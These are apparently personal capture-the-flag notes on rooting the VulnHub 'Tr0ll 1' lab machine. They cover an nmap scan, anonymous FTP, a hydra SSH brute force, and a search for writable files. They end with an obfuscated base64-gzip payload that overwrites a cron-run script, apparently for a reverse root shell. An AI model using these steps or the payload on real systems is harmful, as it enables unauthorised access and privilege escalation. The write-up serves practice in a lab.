NOTES ABOUT Tr0ll 1
[ 2022-09-26 ] [ VulnHub / Tr0ll 1 ]Status: Rooted
Skills: Port Scanning, FTP, Brute Force, File Search
Tools: nmap, wireshark, hydra, find
PORT SCANNING
$ nmap -v -sS -A -p- 10.0.2.6
[...]
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
[...]
GETTING IN
$ ftp anonymous@10.0.2.6
ls
get lol.pcap
wireshark lol.pcap
WEB: http://10.0.2.6/sup3rs3cr3tdirlol/
$ wget http://10.0.2.6/sup3rs3cr3tdirlol/roflmao
$ strings roflmao
[...]
Find address 0x0856BF to proceed
[...]
WEB: http://10.0.2.6/0x0856BF/
SSH DICTIONARY BRUTE FORCE
$ hydra -L /home/kali/CTF/Tr0ll1/users.txt -p "Pass.txt" 10.0.2.6 ssh
[...]
[22][ssh] host: 10.0.2.6 login: overflow password: Pass.txt
1 of 1 target successfully completed, 1 valid password found
[...]
SEARCHING VULNS
$ find / -writable 2>/dev/null
$ find / -type f -perm 0777 2>/dev/null
/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/lib/log/cleaner.py
$ cat /var/log/cronlog
*/2 * * * * cleaner.py
REVERSE ROOT SHELL
ssh overflow@10.0.2.6
echo H4sIAAAAAAAAA8vMLcgvKlEozk/OTi3RyS/WKSiptC62hfD1IJQGlOfoFu/p5xqiA+UG+zt7xweHBLk6+mpaF+sl5+flpSaXaGgoGRroGegZ6RmaKumYmBhralrnF+ullBYYaRTrpWXmpObla2jqGGAVNcQqaqRpDXSVXnFBYnmehpJ+UmaefnGGkiYXAEwY6cC8AAAA | base64 -d | gzip -d > /lib/log/cleaner.py